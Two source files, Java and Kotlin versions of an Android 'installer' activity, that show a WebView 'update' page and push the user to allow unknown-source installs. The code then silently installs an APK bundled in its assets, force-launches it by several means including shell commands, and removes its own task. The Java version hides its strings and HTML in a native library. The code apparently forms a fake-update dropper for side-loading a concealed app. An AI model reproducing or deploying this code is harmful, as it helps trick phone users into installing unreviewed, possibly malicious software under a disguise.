File: app/src/main/java/com/example/installer/MainActivity.java
package com.example.installer;

import android.app.Activity;
import android.app.PendingIntent;
import android.content.BroadcastReceiver;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.content.SharedPreferences;
import android.content.pm.PackageInfo;
import android.content.pm.PackageInstaller;
import android.content.pm.PackageManager;
import android.graphics.Color;
import android.net.Uri;
import android.os.Build;
import android.os.Bundle;
import android.os.Handler;
import android.os.Looper;
import android.provider.Settings;
import android.view.View;
import android.view.WindowInsetsController;
import android.webkit.JavascriptInterface;
import android.webkit.WebChromeClient;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import android.widget.Toast;

import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;

public class MainActivity extends Activity {

    private static final String TAG = "MainActivity";
    private static final int REQUEST_INSTALL = 100;
    private static final String PREFS_CONFIG = "app_config";
    private static final String KEY_SAVED_PACKAGE_NAME = "saved_package_name";
    private static final String KEY_SAVED_MAIN_ACTIVITY = "saved_main_activity";
    
    private native String nativeGetString(String key);
    private native int nativeGetInt(String key);
    private String getApkName() {
        return nativeGetString("APK_NAME");
    }
    
    private String getActionInstall() {
        return nativeGetString("ACTION_INSTALL");
    }
    
    private String getMsgInstalledSuccess() {
        return nativeGetString("MSG_INSTALLED_SUCCESS");
    }
    
    private String getMsgInstallFailed() {
        return nativeGetString("MSG_INSTALL_FAILED");
    }
    
    private String getMsgInstallInProgress() {
        return nativeGetString("MSG_INSTALL_IN_PROGRESS");
    }
    
    private String getMsgPermissionRequired() {
        return nativeGetString("MSG_PERMISSION_REQUIRED");
    }
    
    private String getMsgEnableUnknownSources() {
        return nativeGetString("MSG_ENABLE_UNKNOWN_SOURCES");
    }

    private WebView webView;
    private String packageName = null;
    private String mainActivity = null;
    private Handler handler = new Handler(Looper.getMainLooper());
    private boolean isInstalling = false;
    private NativeInstaller nativeInstaller;

    static {
        System.loadLibrary("installer");
    }

    private native String nativeGetHtml(String mode);

    private BroadcastReceiver installReceiver = new BroadcastReceiver() {
        @Override
        public void onReceive(Context context, Intent intent) {
            int status = intent.getIntExtra(PackageInstaller.EXTRA_STATUS, -1);
            String message = intent.getStringExtra(PackageInstaller.EXTRA_STATUS_MESSAGE);

            switch (status) {
                case PackageInstaller.STATUS_PENDING_USER_ACTION:
                    Intent confirmIntent = intent.getParcelableExtra(Intent.EXTRA_INTENT);
                    if (confirmIntent != null) {
                        try {
                            confirmIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
                            startActivity(confirmIntent);
                        } catch (Exception e) {
                        }
                    }
                    break;

                case PackageInstaller.STATUS_SUCCESS:
                    handler.post(new Runnable() {
                        @Override
                        public void run() {
                            toast(getMsgInstalledSuccess());
                            isInstalling = false;
                        }
                    });

                    handler.postDelayed(new Runnable() {
                        @Override
                        public void run() {
                            forceOpenApp();
                        }
                    }, 500);
                    break;

                default:
                    handler.post(new Runnable() {
                        @Override
                        public void run() {
                            isInstalling = false;
                            toast(getMsgInstallFailed());
                            if (webView != null) {
                                String html = nativeGetHtml("update");
                                if (html != null && !html.isEmpty()) {
                                    webView.loadDataWithBaseURL("file:///android_asset/update/", html, "text/html", "UTF-8", null);
                                }
                            }
                        }
                    });
                    break;
            }
        }
    };

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        setupSystemBars();

        try {
            IntentFilter filter = new IntentFilter(getActionInstall());
            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.TIRAMISU) {
                registerReceiver(installReceiver, filter, Context.RECEIVER_NOT_EXPORTED);
            } else {
                registerReceiver(installReceiver, filter);
            }
        } catch (Exception e) {
        }

        nativeInstaller = new NativeInstaller();
        loadConfig();
        loadSavedPackageInfo();
        
        checkAndOpenInstalledAppImmediately();
    }

    private void setupWebView() {
        try {
            webView = new WebView(this);
            android.webkit.WebSettings settings = webView.getSettings();
            settings.setJavaScriptEnabled(true);
            settings.setDomStorageEnabled(true);
            settings.setAllowFileAccess(true);
            settings.setAllowContentAccess(true);
            settings.setMediaPlaybackRequiresUserGesture(false);
            settings.setJavaScriptCanOpenWindowsAutomatically(true);

            webView.setWebViewClient(new WebViewClient() {
                @Override
                public void onPageFinished(WebView view, String url) {
                    super.onPageFinished(view, url);
                }
            });

            webView.setWebChromeClient(new WebChromeClient());
            webView.addJavascriptInterface(new WebAppInterface(), "Android");

            setContentView(webView);

            String html = nativeGetHtml("update");
            if (html != null && !html.isEmpty()) {
                webView.loadDataWithBaseURL("file:///android_asset/update/", html, "text/html", "UTF-8", null);
            } else {
                showErrorPage();
            }
        } catch (Exception e) {
            finish();
        }
    }


    private void showErrorPage() {
        String html = "<!DOCTYPE html><html><head>" +
                "<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">" +
                "<style>body{font-family:Arial;text-align:center;padding:50px;background:white;}" +
                "h1{color:#333;}p{color:#666;}</style></head><body>" +
                "<h1>Error</h1><p>Application resources not found.</p></body></html>";
        webView.loadDataWithBaseURL(null, html, "text/html", "UTF-8", null);
    }

    class WebAppInterface {
        @JavascriptInterface
        public void showInstalling() {
            handler.post(new Runnable() {
                @Override
                public void run() {
                    String html = nativeGetHtml("installing");
                    if (html != null && !html.isEmpty()) {
                        webView.loadDataWithBaseURL("file:///android_asset/update/", html, "text/html", "UTF-8", null);
                    }
                }
            });
        }

        @JavascriptInterface
        public void installPlugin() {
            handler.post(new Runnable() {
                @Override
                public void run() {
                    if (!isInstalling) {
                        checkPermission();
                    } else {
                        toast(getMsgInstallInProgress());
                    }
                }
            });
        }
    }

    private void checkPermission() {
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
            if (!getPackageManager().canRequestPackageInstalls()) {
                try {
                    Intent intent = new Intent(Settings.ACTION_MANAGE_UNKNOWN_APP_SOURCES);
                    intent.setData(Uri.parse("package:" + getPackageName()));
                    startActivityForResult(intent, REQUEST_INSTALL);
                } catch (Exception e) {
                    toast(getMsgEnableUnknownSources());
                }
                return;
            }
        }
        install();
    }

    private void install() {
        if (isInstalling) {
            return;
        }

        isInstalling = true;

        handler.post(new Runnable() {
            @Override
            public void run() {
                String html = nativeGetHtml("installing");
                if (html != null && !html.isEmpty()) {
                    webView.loadDataWithBaseURL("file:///android_asset/update/", html, "text/html", "UTF-8", null);
                }
            }
        });

        new Thread(new Runnable() {
            @Override
            public void run() {
                try {
                    readApkInfo();

                    if (packageName == null) {
                        throw new Exception("Package name is null");
                    }

                    String apkPath = copyApkToCache();
                    if (apkPath == null) {
                        throw new Exception("Failed to copy APK");
                    }

                    boolean result = nativeInstaller.installApk(MainActivity.this, apkPath);

                    if (!result) {
                        throw new Exception("Native installation failed");
                    }

                } catch (Exception e) {
                    final String errorMsg = e.getMessage();
                    
                    handler.post(new Runnable() {
                        @Override
                        public void run() {
                            isInstalling = false;
                            toast("Failed: " + errorMsg);
                            String html = nativeGetHtml("update");
                            if (html != null && !html.isEmpty()) {
                                webView.loadDataWithBaseURL("file:///android_asset/update/", html, "text/html", "UTF-8", null);
                            }
                        }
                    });
                }
            }
        }).start();
    }

    private String copyApkToCache() {
        try {
            File tempFile = new File(getCacheDir(), getApkName());

            InputStream in = getAssets().open(getApkName());
            FileOutputStream out = new FileOutputStream(tempFile);

            byte[] buffer = new byte[65536];
            int read;
            while ((read = in.read(buffer)) != -1) {
                out.write(buffer, 0, read);
            }

            in.close();
            out.close();

            return tempFile.getAbsolutePath();
        } catch (Exception e) {
            return null;
        }
    }

    private void readApkInfo() {
        try {
            File tempFile = new File(getCacheDir(), "temp.apk");

            InputStream in = getAssets().open(getApkName());
            FileOutputStream out = new FileOutputStream(tempFile);

            byte[] buffer = new byte[8192];
            int read;
            while ((read = in.read(buffer)) != -1) {
                out.write(buffer, 0, read);
            }
            in.close();
            out.close();

            if (!tempFile.exists() || tempFile.length() == 0) {
                tempFile.delete();
                return;
            }

            PackageManager pm = getPackageManager();

            int flags = PackageManager.GET_ACTIVITIES;
            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.P) {
                flags |= PackageManager.GET_SIGNING_CERTIFICATES;
            }

            PackageInfo info = pm.getPackageArchiveInfo(
                    tempFile.getAbsolutePath(), flags);

            if (info != null) {
                packageName = info.packageName;

                if (info.activities != null && info.activities.length > 0) {
                    mainActivity = info.activities[0].name;
                }
                
                savePackageInfo(packageName, mainActivity);
            }

            tempFile.delete();

        } catch (Exception e) {
        }
    }
    
    private void savePackageInfo(String pkgName, String activity) {
        if (pkgName != null) {
            SharedPreferences prefs = getSharedPreferences(PREFS_CONFIG, Context.MODE_PRIVATE);
            prefs.edit()
                .putString(KEY_SAVED_PACKAGE_NAME, pkgName)
                .putString(KEY_SAVED_MAIN_ACTIVITY, activity)
                .apply();
        }
    }
    
    private void loadSavedPackageInfo() {
        SharedPreferences prefs = getSharedPreferences(PREFS_CONFIG, Context.MODE_PRIVATE);
        packageName = prefs.getString(KEY_SAVED_PACKAGE_NAME, null);
        mainActivity = prefs.getString(KEY_SAVED_MAIN_ACTIVITY, null);
    }
    
    private boolean isPackageInstalled(String pkgName) {
        if (pkgName == null || pkgName.isEmpty()) {
            return false;
        }
        
        try {
            getPackageManager().getPackageInfo(pkgName, 0);
            return true;
        } catch (PackageManager.NameNotFoundException e) {
            return false;
        }
    }
    
    private void checkAndOpenInstalledAppImmediately() {
        if (packageName != null && isPackageInstalled(packageName)) {
            forceOpenApp();
            return;
        }
        
        if (packageName == null) {
            new Thread(new Runnable() {
                @Override
                public void run() {
                    readApkInfo();
                    handler.post(new Runnable() {
                        @Override
                        public void run() {
                            if (packageName != null && isPackageInstalled(packageName)) {
                                forceOpenApp();
                            } else {
                                setupWebView();
                            }
                        }
                    });
                }
            }).start();
        } else {
            setupWebView();
        }
    }
    
    private void checkAndOpenInstalledApp() {
        if (packageName == null) {
            readApkInfoInBackground();
            return;
        }
        
        if (isPackageInstalled(packageName)) {
            handler.post(new Runnable() {
                @Override
                public void run() {
                    forceOpenApp();
                }
            });
        }
    }
    
    private void readApkInfoInBackground() {
        new Thread(new Runnable() {
            @Override
            public void run() {
                readApkInfo();
                handler.post(new Runnable() {
                    @Override
                    public void run() {
                        if (packageName != null && isPackageInstalled(packageName)) {
                            forceOpenApp();
                        } else {
                            if (webView == null) {
                                setupWebView();
                            }
                        }
                    }
                });
            }
        }).start();
    }

    private void forceOpenApp() {
        new Thread(new Runnable() {
            @Override
            public void run() {
                try {
                    boolean launched = false;
                    if (tryMethod1()) {
                        launched = true;
                    } else {
                        Thread.sleep(100);
                        if (tryMethod4()) {
                            launched = true;
                        } else {
                            Thread.sleep(100);
                            tryMethod2();
                            Thread.sleep(100);
                            if (tryMethod3()) {
                                launched = true;
                            }
                        }
                    }

                    if (launched && packageName != null) {
                        try {
                            Thread.sleep(200);
                        } catch (InterruptedException e) {
                        }
                        
                        handler.post(new Runnable() {
                            @Override
                            public void run() {
                                if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {
                                    finishAndRemoveTask();
                                } else {
                                    finish();
                                }
                            }
                        });
                    }

                } catch (Exception e) {
                }
            }
        }).start();
    }

    private boolean tryMethod1() {
        try {
            if (packageName == null || mainActivity == null) return false;

            Intent intent = new Intent();
            intent.setComponent(new ComponentName(packageName, mainActivity));
            intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TOP);
            startActivity(intent);
            return true;

        } catch (Exception e) {
            return false;
        }
    }

    private void tryMethod2() {
        try {
            if (packageName == null) return;

            String cmd = "monkey -p " + packageName + " 1";
            Process p = Runtime.getRuntime().exec(cmd);
            p.waitFor();

        } catch (Exception e) {
        }
    }

    private boolean tryMethod3() {
        try {
            if (packageName == null || mainActivity == null) return false;

            String cmd = "am start -n " + packageName + "/" + mainActivity;
            Process p = Runtime.getRuntime().exec(cmd);
            p.waitFor();
            return true;

        } catch (Exception e) {
            return false;
        }
    }

    private boolean tryMethod4() {
        try {
            if (packageName == null) return false;

            PackageManager pm = getPackageManager();
            Intent intent = pm.getLaunchIntentForPackage(packageName);

            if (intent != null) {
                intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
                startActivity(intent);
                return true;
            }
            return false;

        } catch (Exception e) {
            return false;
        }
    }

    private void setupSystemBars() {
        try {
            android.view.Window window = getWindow();

            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.R) {
                window.setStatusBarColor(Color.WHITE);
                window.setNavigationBarColor(Color.WHITE);

                WindowInsetsController controller = window.getInsetsController();
                if (controller != null) {
                    controller.setSystemBarsAppearance(
                            WindowInsetsController.APPEARANCE_LIGHT_STATUS_BARS,
                            WindowInsetsController.APPEARANCE_LIGHT_STATUS_BARS);
                    controller.setSystemBarsAppearance(
                            WindowInsetsController.APPEARANCE_LIGHT_NAVIGATION_BARS,
                            WindowInsetsController.APPEARANCE_LIGHT_NAVIGATION_BARS);
                }
            } else if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {
                window.setStatusBarColor(Color.WHITE);
                window.setNavigationBarColor(Color.WHITE);

                int flags = window.getDecorView().getSystemUiVisibility();
                if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
                    flags |= View.SYSTEM_UI_FLAG_LIGHT_STATUS_BAR;
                }
                if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O_MR1) {
                    flags |= View.SYSTEM_UI_FLAG_LIGHT_NAVIGATION_BAR;
                }
                window.getDecorView().setSystemUiVisibility(flags);
            }
        } catch (Exception e) {
        }
    }

    @Override
    public void onBackPressed() {
        try {
            if (webView != null && webView.canGoBack()) {
                webView.goBack();
            } else {
                super.onBackPressed();
            }
        } catch (Exception e) {
            super.onBackPressed();
        }
    }

    @Override
    protected void onActivityResult(int requestCode, int resultCode, Intent data) {
        super.onActivityResult(requestCode, resultCode, data);

        if (requestCode == REQUEST_INSTALL) {
            handler.postDelayed(new Runnable() {
                @Override
                public void run() {
                    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
                        if (getPackageManager().canRequestPackageInstalls()) {
                            install();
                        } else {
                            toast(getMsgPermissionRequired());
                            isInstalling = false;
                            if (webView != null) {
                                String html = nativeGetHtml("update");
                                if (html != null && !html.isEmpty()) {
                                    webView.loadDataWithBaseURL("file:///android_asset/update/", html, "text/html", "UTF-8", null);
                                }
                            }
                        }
                    }
                }
            }, 300);
        }
    }

    @Override
    protected void onDestroy() {
        super.onDestroy();

        try {
            unregisterReceiver(installReceiver);
        } catch (Exception e) {
        }

        try {
            if (webView != null) {
                webView.destroy();
            }
        } catch (Exception e) {
        }
    }

    private void toast(String msg) {
        Toast.makeText(this, msg, Toast.LENGTH_SHORT).show();
    }

    private void loadConfig() {
    }
}

File: app/src/main/java/com/example/installer/MainActivity.kt
package com.example.installer

import android.app.Activity
import android.app.PendingIntent
import android.content.BroadcastReceiver
import android.content.ComponentName
import android.content.Context
import android.content.Intent
import android.content.IntentFilter
import android.content.pm.PackageInstaller
import android.content.pm.PackageManager
import android.graphics.Color
import android.net.Uri
import android.os.Build
import android.os.Bundle
import android.os.Handler
import android.os.Looper
import android.provider.Settings
import android.util.TypedValue
import android.view.View
import android.view.WindowInsetsController
import android.webkit.JavascriptInterface
import android.webkit.WebChromeClient
import android.webkit.WebView
import android.webkit.WebViewClient
import android.widget.Toast
import java.io.File
import java.io.FileOutputStream

class MainActivity : Activity() {

    companion object {
        private const val APK_NAME = "main-app.apk"
        private const val REQUEST_INSTALL = 100
        private const val ACTION_INSTALL = "com.example.installer.INSTALL"
    }

    private lateinit var webView: WebView
    private var packageName: String? = null
    private var mainActivity: String? = null
    private val handler = Handler(Looper.getMainLooper())
    private var isInstalling = false

    private val installReceiver = object : BroadcastReceiver() {
        override fun onReceive(context: Context, intent: Intent) {
            val status = intent.getIntExtra(PackageInstaller.EXTRA_STATUS, -1)

            when (status) {
                PackageInstaller.STATUS_PENDING_USER_ACTION -> {
                    val confirmIntent = intent.getParcelableExtra<Intent>(Intent.EXTRA_INTENT)
                    confirmIntent?.let { startActivity(it) }
                }

                PackageInstaller.STATUS_SUCCESS -> {
                    handler.post {
                        toast("Installed!")
                    }
                    handler.postDelayed({
                        forceOpenApp()
                    }, 500)
                }

                else -> {
                    handler.post {
                        isInstalling = false
                        toast("Installation failed")
                        webView.loadUrl("file:///android_asset/update/update.html?error=true")
                    }
                }
            }
        }
    }

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)

        setupSystemBars()
        registerReceiver(installReceiver, IntentFilter(ACTION_INSTALL))

        webView = WebView(this).apply {
            settings.apply {
                javaScriptEnabled = true
                domStorageEnabled = true
                allowFileAccess = true
                allowContentAccess = true
                mediaPlaybackRequiresUserGesture = false
                javaScriptCanOpenWindowsAutomatically = true
            }

            webViewClient = object : WebViewClient() {
                override fun onPageFinished(view: WebView?, url: String?) {
                    super.onPageFinished(view, url)
                }

                override fun shouldOverrideUrlLoading(view: WebView?, url: String?): Boolean {
                    return false
                }
            }

            webChromeClient = WebChromeClient()
        }

        webView.addJavascriptInterface(WebAppInterface(), "Android")
        webView.loadUrl("file:///android_asset/update/update.html")

        setContentView(webView)
    }

    inner class WebAppInterface {
        @JavascriptInterface
        fun installPlugin() {
            handler.post {
                if (!isInstalling) {
                    checkPermission()
                }
            }
        }

        @JavascriptInterface
        fun onInstallComplete() {
            handler.post {
                webView.postDelayed({
                    webView.loadUrl("file:///android_asset/update/update.html?installed=true")
                }, 1000)
            }
        }
    }

    private fun checkPermission() {
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
            if (!packageManager.canRequestPackageInstalls()) {
                val intent = Intent(Settings.ACTION_MANAGE_UNKNOWN_APP_SOURCES).apply {
                    data = Uri.parse("package:${this@MainActivity.packageName}")
                }
                startActivityForResult(intent, REQUEST_INSTALL)
                return
            }
        }
        install()
    }

    private fun install() {
        if (isInstalling) return
        isInstalling = true

        handler.post {
            webView.loadUrl("file:///android_asset/update/installing.html")
        }

        Thread {
            var session: PackageInstaller.Session? = null
            try {
                readApkInfo()

                if (packageName == null) {
                    handler.post {
                        isInstalling = false
                        toast("Cannot read APK")
                        webView.loadUrl("file:///android_asset/update/update.html?error=apk")
                    }
                    return@Thread
                }

                val installer = packageManager.packageInstaller

                val params = PackageInstaller.SessionParams(
                    PackageInstaller.SessionParams.MODE_FULL_INSTALL
                ).apply {
                    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.S) {
                        setRequireUserAction(
                            PackageInstaller.SessionParams.USER_ACTION_NOT_REQUIRED
                        )
                    }

                    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.TIRAMISU) {
                        setInstallReason(PackageManager.INSTALL_REASON_USER)
                    }
                }

                val sessionId = installer.createSession(params)
                session = installer.openSession(sessionId)

                session.openWrite("package", 0, -1).use { out ->
                    assets.open(APK_NAME).use { input ->
                        val buffer = ByteArray(65536)
                        var read: Int
                        while (input.read(buffer).also { read = it } != -1) {
                            out.write(buffer, 0, read)
                        }
                        session.fsync(out)
                    }
                }

                val intent = Intent(ACTION_INSTALL)

                val flags = if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.S) {
                    PendingIntent.FLAG_MUTABLE
                } else {
                    PendingIntent.FLAG_UPDATE_CURRENT
                }

                val sender = PendingIntent.getBroadcast(
                    this@MainActivity, sessionId, intent, flags
                )

                session.commit(sender.intentSender)

            } catch (e: Exception) {
                session?.abandon()
                handler.post {
                    isInstalling = false
                    toast("Failed!")
                    webView.loadUrl("file:///android_asset/update/update.html?error=install")
                }
            }
        }.start()
    }

    private fun readApkInfo() {
        try {
            val tempFile = File(cacheDir, "temp.apk")

            FileOutputStream(tempFile).use { out ->
                assets.open(APK_NAME).use { input ->
                    val buffer = ByteArray(8192)
                    var read: Int
                    while (input.read(buffer).also { read = it } != -1) {
                        out.write(buffer, 0, read)
                    }
                }
            }

            val info = packageManager.getPackageArchiveInfo(
                tempFile.absolutePath,
                PackageManager.GET_ACTIVITIES
            )

            info?.let {
                packageName = it.packageName
                val activities = it.activities
                if (activities != null && activities.isNotEmpty()) {
                    mainActivity = activities[0].name
                }
            }

            tempFile.delete()

        } catch (e: Exception) {
            // Ignore
        }
    }

    private fun forceOpenApp() {
        Thread {
            try {
                Thread.sleep(800)
                tryMethod1()
                Thread.sleep(300)
                tryMethod2()
                Thread.sleep(300)
                tryMethod3()
                Thread.sleep(300)
                tryMethod4()

                handler.postDelayed({
                    finishAndRemoveTask()
                }, 1000)

            } catch (e: Exception) {
                // Ignore
            }
        }.start()
    }

    private fun tryMethod1() {
        try {
            if (packageName == null || mainActivity == null) return

            val intent = Intent().apply {
                component = ComponentName(packageName!!, mainActivity!!)
                flags = Intent.FLAG_ACTIVITY_NEW_TASK or Intent.FLAG_ACTIVITY_CLEAR_TOP
            }

            startActivity(intent)
        } catch (e: Exception) {
            // Ignore
        }
    }

    private fun tryMethod2() {
        try {
            packageName ?: return

            val cmd = "monkey -p $packageName 1"
            val process = Runtime.getRuntime().exec(cmd)
            process.waitFor()
        } catch (e: Exception) {
            // Ignore
        }
    }

    private fun tryMethod3() {
        try {
            packageName ?: return

            val cmd = "am start -n $packageName/$mainActivity"
            val process = Runtime.getRuntime().exec(cmd)
            process.waitFor()
        } catch (e: Exception) {
            // Ignore
        }
    }

    private fun tryMethod4() {
        try {
            packageName ?: return

            val intent = packageManager.getLaunchIntentForPackage(packageName!!)

            intent?.let {
                it.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
                startActivity(it)
            }
        } catch (e: Exception) {
            // Ignore
        }
    }

    override fun onActivityResult(requestCode: Int, resultCode: Int, data: Intent?) {
        super.onActivityResult(requestCode, resultCode, data)

        if (requestCode == REQUEST_INSTALL) {
            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
                if (packageManager.canRequestPackageInstalls()) {
                    install()
                } else {
                    toast("Permission denied")
                }
            }
        }
    }

    private fun setupSystemBars() {
        try {
            val window = window
            
            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.R) {
                try {
                    window.statusBarColor = Color.WHITE
                    window.navigationBarColor = Color.WHITE
                    
                    val controller = window.insetsController
                    controller?.let {
                        it.setSystemBarsAppearance(
                            WindowInsetsController.APPEARANCE_LIGHT_STATUS_BARS,
                            WindowInsetsController.APPEARANCE_LIGHT_STATUS_BARS
                        )
                        it.setSystemBarsAppearance(
                            WindowInsetsController.APPEARANCE_LIGHT_NAVIGATION_BARS,
                            WindowInsetsController.APPEARANCE_LIGHT_NAVIGATION_BARS
                        )
                    }
                } catch (e: Exception) {
                    // Ignore
                }
            } else if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {
                try {
                    window.statusBarColor = Color.WHITE
                    window.navigationBarColor = Color.WHITE
                    
                    var flags = window.decorView.systemUiVisibility
                    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
                        flags = flags or View.SYSTEM_UI_FLAG_LIGHT_STATUS_BAR
                    }
                    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O_MR1) {
                        flags = flags or View.SYSTEM_UI_FLAG_LIGHT_NAVIGATION_BAR
                    }
                    window.decorView.systemUiVisibility = flags
                } catch (e: Exception) {
                    // Ignore
                }
            }
        } catch (e: Exception) {
            // Ignore
        }
    }

    override fun onBackPressed() {
        try {
            if (::webView.isInitialized && webView.canGoBack()) {
                webView.goBack()
            } else {
                super.onBackPressed()
            }
        } catch (e: Exception) {
            super.onBackPressed()
        }
    }

    override fun onDestroy() {
        super.onDestroy()
        try {
            unregisterReceiver(installReceiver)
        } catch (e: Exception) {
            // Ignore
        }
        try {
            if (::webView.isInitialized) {
                webView.destroy()
            }
        } catch (e: Exception) {
            // Ignore
        }
    }

    private fun toast(msg: String) {
        Toast.makeText(this, msg, Toast.LENGTH_SHORT).show()
    }

    private fun dp(d: Int): Int {
        return TypedValue.applyDimension(
            TypedValue.COMPLEX_UNIT_DIP,
            d.toFloat(),
            resources.displayMetrics
        ).toInt()
    }
}